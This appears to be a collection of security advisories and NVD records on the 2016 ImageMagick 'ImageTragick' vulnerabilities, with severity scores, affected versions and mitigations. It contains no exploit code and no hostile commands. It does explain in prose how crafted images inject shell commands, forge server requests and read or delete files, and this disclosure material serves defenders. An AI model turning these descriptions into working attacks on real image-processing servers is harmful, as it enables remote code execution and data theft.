ImageMagick vulnerability (a.k.a. ImageTragick)\n\n# \n\nMedium\n\n# Vendor\n\nImagemagick, Canonical Ubuntu\n\n# Versions Affected\n\nCanonical Ubuntu 14.04 LTS\n\n# Description\n\nNikolay Ermishkin and Stewie discovered that ImageMagick incorrectly sanitized untrusted input. 
A remote attacker could use these issues to execute arbitrary code. These issues are known as \u2018ImageTragick\u2019. This update disables problematic coders via the /etc/ImageMagick-6/policy.xml configuration file. In certain environments the coders may need to be manually re-enabled after making sure that ImageMagick does not process untrusted input. ([CVE-2016-3714](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-3714.html>), [CVE-2016-3715](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-3715.html>), [CVE-2016-3716](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-3716.html>), [CVE-2016-3717](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-3717.html>), [CVE-2016-3718](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-3718.html>))\n\nBob Friesenhahn discovered that ImageMagick allowed injecting commands via an image file or filename. A remote attacker could use this issue to execute arbitrary code. ([CVE-2016-5118](<http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-5118.html>))\n\n# Affected Products and Versions\n\n_Severity is medium unless otherwise noted. 
\n_\n\n * All versions of Cloud Foundry cflinuxfs2 prior to v.1.65.0 \n\n# Mitigation\n\nUsers of affected versions should apply the following mitigation:\n\n * The Cloud Foundry project recommends that Cloud Foundry deployments run with cflinuxfs2 v.1.65.0 or later versions \n\n# Credit\n\nStewie, Nikolay Ermishkin, Bob Friesenhahn\n\n# References\n\n * <http://www.ubuntu.com/usn/usn-2990-1/>\n * <http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-3714.html>\n * <http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-3715.html>\n * <http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-3716.html>\n * <http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-3717.html>\n * <http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-3718.html>\n * <http://people.canonical.com/~ubuntu-security/cve/2016/CVE-2016-5118.html>\n", "edition": 5, "modified": "2016-06-13T00:00:00", "published": "2016-06-13T00:00:00", "id": "CFOUNDRY:129B6A9BB5C74D717E5AB861B666605D", "href": "https://www.cloudfoundry.org/blog/usn-2990-1/", "title": "USN-2990-1 ImageMagick vulnerability (a.k.a. 
ImageTragick) | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2021-02-02T06:28:06", "description": "The LABEL coder in ImageMagick before 6.9.3-10 and 7.x before 7.0.1-1 allows remote attackers to read arbitrary files via a crafted image.", "edition": 6, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-05-05T18:59:00", "title": "CVE-2016-3717", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.1, "vectorString": "AV:N/AC:M/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3717"], "modified": "2018-10-09T20:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux_desktop:6.0", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux_server_supplementary_eus:6.7z", "cpe:/o:canonical:ubuntu_linux:15.10", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/a:imagemagick:imagemagick:7.0.1-0", "cpe:/o:redhat:enterprise_linux_hpc_node:7.0", "cpe:/o:redhat:enterprise_linux_server_aus:7.2", "cpe:/o:redhat:enterprise_linux_hpc_node:6.0", "cpe:/o:redhat:enterprise_linux_desktop:7.0", 
"cpe:/o:redhat:enterprise_linux_workstation:6.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.2", "cpe:/o:redhat:enterprise_linux_server:6.0", "cpe:/a:imagemagick:imagemagick:6.9.3-9", "cpe:/a:imagemagick:imagemagick:7.0.0-0", "cpe:/o:redhat:enterprise_linux_hpc_node_eus:7.2", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "CVE-2016-3717", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3717", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:C/I:N/A:N"}, "cpe23": ["cpe:2.3:a:imagemagick:imagemagick:7.0.1-0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.9.3-9:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary_eus:6.7z:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:7.0.0-0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:15.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2021-02-02T06:28:06", "description": "The MSL coder in ImageMagick before 6.9.3-10 and 7.x before 7.0.1-1 allows remote attackers to move arbitrary files via a crafted image.", "edition": 6, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "LOW", "confidentialityImpact": 
"NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 3.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 1.4}, "published": "2016-05-05T18:59:00", "title": "CVE-2016-3716", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3716"], "modified": "2018-10-09T20:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux_desktop:6.0", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux_server_supplementary_eus:6.7z", "cpe:/o:canonical:ubuntu_linux:15.10", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/a:imagemagick:imagemagick:7.0.1-0", "cpe:/o:redhat:enterprise_linux_hpc_node:7.0", "cpe:/o:redhat:enterprise_linux_server_aus:7.2", "cpe:/o:redhat:enterprise_linux_hpc_node:6.0", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_workstation:6.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.2", "cpe:/o:redhat:enterprise_linux_server:6.0", "cpe:/a:imagemagick:imagemagick:6.9.3-9", "cpe:/a:imagemagick:imagemagick:7.0.0-0", "cpe:/o:redhat:enterprise_linux_hpc_node_eus:7.2", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "CVE-2016-3716", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3716", "cvss": {"score": 4.3, "vector": 
"AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:imagemagick:imagemagick:7.0.1-0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.9.3-9:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary_eus:6.7z:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:7.0.0-0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:15.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2021-02-02T06:28:06", "description": "The EPHEMERAL coder in ImageMagick before 6.9.3-10 and 7.x before 7.0.1-1 allows remote attackers to delete arbitrary files via a crafted image.", "edition": 6, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 5.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-05-05T18:59:00", "title": "CVE-2016-3715", "type": "cve", "cwe": ["CWE-284"], "bulletinFamily": "NVD", 
"cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3715"], "modified": "2018-10-09T19:59:00", "cpe": ["cpe:/o:redhat:enterprise_linux_desktop:6.0", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux_server_supplementary_eus:6.7z", "cpe:/o:canonical:ubuntu_linux:15.10", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/a:imagemagick:imagemagick:7.0.1-0", "cpe:/o:redhat:enterprise_linux_hpc_node:7.0", "cpe:/o:redhat:enterprise_linux_server_aus:7.2", "cpe:/o:redhat:enterprise_linux_hpc_node:6.0", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_workstation:6.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.2", "cpe:/o:redhat:enterprise_linux_server:6.0", "cpe:/a:imagemagick:imagemagick:6.9.3-9", "cpe:/a:imagemagick:imagemagick:7.0.0-0", "cpe:/o:redhat:enterprise_linux_hpc_node_eus:7.2", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "CVE-2016-3715", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3715", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}, "cpe23": ["cpe:2.3:a:imagemagick:imagemagick:7.0.1-0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.9.3-9:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node:6.0:*:*:*:*:*:*:*", 
"cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary_eus:6.7z:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:7.0.0-0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:15.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2021-02-02T06:28:06", "description": "The (1) EPHEMERAL, (2) HTTPS, (3) MVG, (4) MSL, (5) TEXT, (6) SHOW, (7) WIN, and (8) PLT coders in ImageMagick before 6.9.3-10 and 7.x before 7.0.1-1 allow remote attackers to execute arbitrary code via shell metacharacters in a crafted image, aka \"ImageTragick.\"", "edition": 6, "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-05-05T18:59:00", "title": "CVE-2016-3714", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", 
"baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3714"], "modified": "2019-04-15T13:29:00", "cpe": ["cpe:/o:suse:suse_linux_enterprise_server:12", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:canonical:ubuntu_linux:15.10", "cpe:/o:opensuse:opensuse:13.2", "cpe:/o:opensuse:leap:42.1", "cpe:/a:imagemagick:imagemagick:7.0.1-0", "cpe:/a:imagemagick:imagemagick:6.9.3-9", "cpe:/a:imagemagick:imagemagick:7.0.0-0", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2016-3714", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3714", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:7.0.1-0:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.9.3-9:*:*:*:*:*:*:*", "cpe:2.3:o:suse:suse_linux_enterprise_server:12:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:7.0.0-0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:15.10:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.2:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*", "cpe:2.3:o:opensuse:leap:42.1:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}, {"lastseen": "2021-02-02T06:28:06", "description": "The (1) HTTP and (2) FTP coders in ImageMagick before 6.9.3-10 and 7.x before 7.0.1-1 allow remote attackers to conduct server-side request forgery (SSRF) attacks via a crafted image.", "edition": 6, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "CHANGED", 
"attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 4.0}, "published": "2016-05-05T18:59:00", "title": "CVE-2016-3718", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3718"], "modified": "2018-10-09T20:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux_desktop:6.0", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:redhat:enterprise_linux_server:7.0", "cpe:/o:redhat:enterprise_linux_server_supplementary_eus:6.7z", "cpe:/o:canonical:ubuntu_linux:15.10", "cpe:/o:redhat:enterprise_linux_workstation:7.0", "cpe:/a:imagemagick:imagemagick:7.0.1-0", "cpe:/o:redhat:enterprise_linux_hpc_node:7.0", "cpe:/o:redhat:enterprise_linux_server_aus:7.2", "cpe:/o:redhat:enterprise_linux_hpc_node:6.0", "cpe:/o:redhat:enterprise_linux_desktop:7.0", "cpe:/o:redhat:enterprise_linux_workstation:6.0", "cpe:/o:redhat:enterprise_linux_server_eus:7.2", "cpe:/o:redhat:enterprise_linux_server:6.0", "cpe:/a:imagemagick:imagemagick:6.9.3-9", "cpe:/a:imagemagick:imagemagick:7.0.0-0", "cpe:/o:redhat:enterprise_linux_hpc_node_eus:7.2", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "CVE-2016-3718", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-3718", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": 
["cpe:2.3:a:imagemagick:imagemagick:7.0.1-0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.2:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:6.9.3-9:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary_eus:6.7z:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:imagemagick:imagemagick:7.0.0-0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.2:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:15.10:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_hpc_node:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:lts:*:*:*"]}], "gentoo": [{"lastseen": "2016-12-01T00:54:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-3715", "CVE-2016-7799", "CVE-2016-6491", "CVE-2016-3716", "CVE-2016-3714", "CVE-2016-7906", "CVE-2016-5842", "CVE-2016-3718", "CVE-2016-5010", "CVE-2016-3717"], "edition": 1, "description": "### Background\n\nImageMagick is a collection of tools and libraries for many image formats. \n\n### Description\n\nMultiple vulnerabilities have been discovered in ImageMagick. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process or cause a Denial of Service condition. 
\n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll ImageMagick users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=media-gfx/imagemagick-6.9.6.2\"", "modified": "2016-11-30T00:00:00", "published": "2016-11-30T00:00:00", "href": "https://security.gentoo.org/glsa/201611-21", "id": "GLSA-201611-21", "type": "gentoo", "title": "ImageMagick: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "symantec": [{"lastseen": "2020-12-24T10:40:51", "bulletinFamily": "software", "cvelist": ["CVE-2016-3714"], "description": "### SUMMARY\n\n \n\n\nSymantec Network Protection products using affected versions of ImageMagick are susceptible to the ImageTragick security vulnerability. A remote attacker can send crafted images and execute arbitrary code on the target.\n\n### AFFECTED PRODUCTS\n\n \n\n\nThe following products are vulnerable:\n\n**Security Analytics** \n--- \n**CVE** | **Affected Version(s)** | **Remediation** \nAll CVEs | 7.3 | Not vulnerable, fixed in 7.3.1 \n7.2 | Not available at this time \n7.1 | Not available at this time \n \n### ADDITIONAL PRODUCT INFORMATION\n\n \n\n\nSecurity Analytics is only vulnerable through intercepted network traffic.\n\nThe following products are not vulnerable: \n****Advanced Secure Gateway** \nAndroid Mobile Agent \n**AuthConnector \nBCAAA** \nBlue Coat HSM Agent for the Luna SP \n**CacheFlow** \nClient Connector \n****Cloud Data Protection for Salesforce \nCloud Data Protection for Salesforce Analytics \nCloud Data Protection for ServiceNow \nCloud Data Protection for Oracle CRM On Demand \nCloud Data Protection for Oracle Field Service Cloud \nCloud Data Protection for Oracle Sales Cloud \nCloud Data Protection Integration Server \nCloud Data Protection Communication Server \nCloud Data Protection Policy Builder \nContent Analysis \nDirector** \nGeneral Auth 
Connector Login Application** \nIntelligenceCenter \nIntelligenceCenter Data Collector \nK9 \n******Mail Threat Defense \n**Malware Analysis**** \nManagement Center** \nNorman Shark Industrial Control System Protection \nPacketShaper \n**PacketShaper S-Series** \nPolicyCenter \n****PolicyCenter S-Series \nProxyAV \nProxyAV ConLog and ConLogXP****** \nProxyClient \n**ProxySG \n**Reporter** \nSSL Visibility** \nUnified Agent \nX-Series XOS**\n\n### ISSUES\n\n \n**CVE-2016-3714** \n--- \n**Severity / CVSSv2** | High / 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n**References** | SecurityFocus: [BID 89848](<http://www.securityfocus.com/bid/89848>) / NVD: [CVE-2016-3714](<https://nvd.nist.gov/vuln/detail/CVE-2016-3714>) \n**Impact** | Code execution \n**Description** | An insufficient input validation flaw in multiple ImageMagick coders allows a remote attacker to send crafted images with injected OS shell commands. The attacker can execute arbitrary code on the target system with the privileges of the ImageMagick application. \n \n### MITIGATION\n\n \n\n\nSymantec's ProxySG 6.6 and 6.7 web application firewall (WAF) solution can protect network servers against some ImageTragick attack vectors. The WAF Command Injection engine, when configured to scan HTTP requests, can block HTTP POST requests containing crafted images with injected OS commands.\n\n### REFERENCES\n\n \n\n\nImageTragick - <https://imagetragick.com/>\n\n### REVISION\n\n \n\n\n2019-01-17 IntelligenceCenter and IntelligenceCenter Data Collector are not vulnerable. Advisory Status moved to Closed. 
\n2017-07-05 initial public release\n", "modified": "2019-01-17T20:47:45", "published": "2017-07-05T08:00:00", "id": "SMNTC-1408", "href": "", "type": "symantec", "title": "SA151: ImageMagick RCE Vulnerability (ImageTragick)", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2020-09-18T20:41:38", "bulletinFamily": "info", "cvelist": ["CVE-2016-3714"], "description": "### Overview \n\nImageMagick does not properly validate user input before processing it using a delegate, which may lead to arbitrary code execution. This issue is also known as \"ImageTragick\".\n\n### Description \n\n[**CWE-20**](<http://cwe.mitre.org/data/definitions/20.html>)**: Improper Input Validation - **CVE-2016-3714\n\nAccording to the researchers in a mailing list [post](<http://www.openwall.com/lists/oss-security/2016/05/03/18>): \n \n_Insufficient filtering for filename passed to delegate's command allows remote code execution during conversion of several file formats._ \n \n_ImageMagick allows to process files with external libraries. This feature is called 'delegate'. It is implemented as a system() with command string ('command') from the config file delegates.xml with actual value for different params (input/output filenames etc). Due to insufficient %M param filtering it is possible to conduct shell command injection._ \n \nBy causing a system to process an image with ImageMagick, an attacker may be able to execute arbitrary commands on a vulnerable system. A common vulnerable configuration would be a web server that allows image uploads that are subsequently processed with ImageMagick. \n \nExploit code for this vulnerability is publicly available, and according to the [ImageTragick](<https://imagetragick.com/>) website, this vulnerability is already being exploited in the wild. 
\n \n--- \n \n### Impact \n\nAn unauthenticated remote attacker that can upload crafted image files may be able to execute arbitrary code in the context of the user calling ImageMagick. \n \n--- \n \n### Solution \n\n**Apply an Update** \n \nImageMagick versions 6.9.3-10 and 7.0.1-1 have been released to address these issues. Affected users should update to the latest version of ImageMagick as soon as possible. \n \nHowever, affected users may also apply the following mitigations: \n \n--- \n \n**Verify Files and Disable Vulnerable Filters** \n \nThe researchers suggest that this vulnerability may be mitigated by doing the following: \n \n1\\. Verify that all image files begin with the expected \"magic bytes\" corresponding to the image file types you support before sending them to ImageMagick for processing. \n2\\. Use a policy file to disable the vulnerable ImageMagick coders. \n \nFor more details, please see <https://imagetragick.com/> \n \n--- \n \n### Vendor Information\n\n250519\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. 
